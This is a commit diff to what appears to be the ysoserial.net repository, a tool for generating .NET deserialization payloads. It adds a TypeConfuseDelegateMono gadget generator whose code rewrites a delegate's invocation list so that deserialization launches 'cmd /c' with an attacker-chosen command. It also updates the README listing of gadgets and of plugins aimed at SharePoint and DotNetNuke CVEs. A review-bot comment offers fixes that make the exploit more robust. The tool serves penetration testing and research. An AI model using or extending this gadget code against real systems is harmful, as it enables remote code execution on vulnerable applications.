
Commit bc778ce

authored
Merge fb52cf8 into 9e03c52
2 parents 9e03c52 + fb52cf8 commit bc778ce


3 files changed

+78
-5
lines changed


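--- a/README.md
+++ b/README.md
@@ -27,6 +27,13 @@ $ ./ysoserial -h
 ysoserial.net generates deserialization payloads for a variety of .NET formatters.
 
 Available formatters:
+ActivitySurrogateDisableTypeCheck (ActivitySurrogateDisableTypeCheck Gadget by Nick Landers. Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored.)
+Formatters:
+BinaryFormatter
+ObjectStateFormatter
+SoapFormatter
+NetDataContractSerializer
+LosFormatter
 ActivitySurrogateSelectorFromFile (ActivitySurrogateSelector gadget by James Forshaw. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'.)
 Formatters:
 BinaryFormatter
@@ -48,7 +55,7 @@ Available formatters:
 XmlSerializer
 DataContractSerializer
 YamlDotNet < 5.0.0
-TextFormattingRunProperties (TextFormattingRunProperties Gadget by Oleksandr Mirosh and Alvaro Munoz.)
+TextFormattingRunProperties (TextFormattingRunProperties Gadget by Oleksandr Mirosh and Alvaro Munoz)
 Formatters:
 BinaryFormatter
 ObjectStateFormatter
@@ -68,23 +75,31 @@ Available formatters:
 ObjectStateFormatter
 NetDataContractSerializer
 LosFormatter
+TypeConfuseDelegateMono (TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono)
+Formatters:
+BinaryFormatter
+ObjectStateFormatter
+NetDataContractSerializer
+LosFormatter
 WindowsIdentity (WindowsIdentity Gadget by Levi Broderick)
 Formatters:
 BinaryFormatter
 Json.Net
 DataContractSerializer
+SoapFormatter
 
 Available plugins:
-altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection)
+ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)
+Altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection)
 ApplicationTrust (Generates XML payload for the ApplicationTrust class)
 Clipboard (Generates payload for DataObject and copy it into the clipboard - ready to be pasted in affected apps)
 DotNetNuke (Generates payload for DotNetNuke CVE-2017-9822)
 Resx (Generates RESX files)
 SessionSecurityTokenHandler (Generates XML payload for the SessionSecurityTokenHandler class)
-SharePoint (Generates poayloads for SharePoint CVEs: CVE-2019-0604, CVE-2018-8421)
+SharePoint (Generates poayloads for the following SharePoint CVEs: CVE-2019-0604, CVE-2018-8421)
 TransactionManagerReenlist (Generates payload for the TransactionManager.Reenlist method)
 ViewState (Generates a ViewState using known MachineKey parameters)
-
+
 Usage: ysoserial.exe [options]
 Options:
 -p, --plugin=VALUE the plugin to be used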
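--- /dev/null
+++ b/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs
@@ -0,0 +1,57 @@
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Reflection;
+
+namespace ysoserial.Generators
+{
+class TypeConfuseDelegateMonoGenerator : GenericGenerator
+{
+public override string Name()
+{
+return "TypeConfuseDelegateMono";
+}
+
+public override string Description()
+{
+return "TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono";
+}
+
+public override List<string> SupportedFormatters()
+{
+return new List<string> { "BinaryFormatter", "ObjectStateFormatter", "NetDataContractSerializer", "LosFormatter" };
+}
+
+public override object Generate(string cmd, string formatter, Boolean test)
+{
+return Serialize(TypeConfuseDelegateGadget(cmd), formatter, test);
+}
+
+/* this can be used easily by the plugins as well */
+public object TypeConfuseDelegateGadget(string cmd)
+{
+if (File.Exists(cmd))
+{
+Console.Error.WriteLine("Reading command from file " + cmd + " ...");
+cmd = File.ReadAllText(cmd);
+}
+Delegate da = new Comparison<string>(String.Compare);
+Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
+IComparer<string> comp = Comparer<string>.Create(d);
+SortedSet<string> set = new SortedSet<string>(comp);
+set.Add("cmd");
+set.Add("/c " + cmd);
+
+FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
+object[] invoke_list = d.GetInvocationList();
+// Modify the invocation list to add Process::Start(string, string)
+invoke_list[0] = new Func<string, string, Process>(Process.Start);
+invoke_list[1] = new Func<string, string, Process>(Process.Start);
+fi.SetValue(d, invoke_list);
+
+return set;
+}
+
+}
+}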
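Review bot: `fi`, obtained from `typeof(MulticastDelegate).GetField("_invocationList", ...)`, is used without a null check, so on a runtime where that private field is named or laid out differently the generator dies with a bare NullReferenceException at `fi.SetValue(d, invoke_list)`; since this variant exists precisely to run on a different runtime (Mono, per `Description()`), that is the most likely failure and deserves a clear message, e.g. `if (fi is null) throw new InvalidOperationException("MulticastDelegate._invocationList not found on this runtime");`. The `File.Exists(cmd)` branch silently replaces the command with the contents of any existing file whose name matches it; that behaviour is worth stating in a doc comment on `TypeConfuseDelegateGadget` so plugin authors calling it are not surprised. Minor style: `Boolean test` would normally be `bool test`, `invoke_list` would be `invokeList`, and the `/* this can be used easily by the plugins as well */` comment reads better as an XML `<summary>` saying the method returns the unserialized gadget object for plugins to serialize themselves.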

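--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -88,6 +88,7 @@
 <Compile Include="Generators\TextFormattingRunPropertiesGenerator.cs" />
 <Compile Include="Generators\PSObjectGenerator.cs" />
 <Compile Include="Generators\TypeConfuseDelegateGenerator.cs" />
+<Compile Include="Generators\TypeConfuseDelegateMonoGenerator.cs" />
 <Compile Include="Generators\WindowsIdentityGenerator.cs" />
 <Compile Include="Plugins\ActivatorUrlPlugin.cs" />
 <Compile Include="Plugins\AltserializationPlugin.cs" />
@@ -118,4 +119,4 @@
 <Target Name="AfterBuild">
 </Target>
 -->
-</Project>
+</Project>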
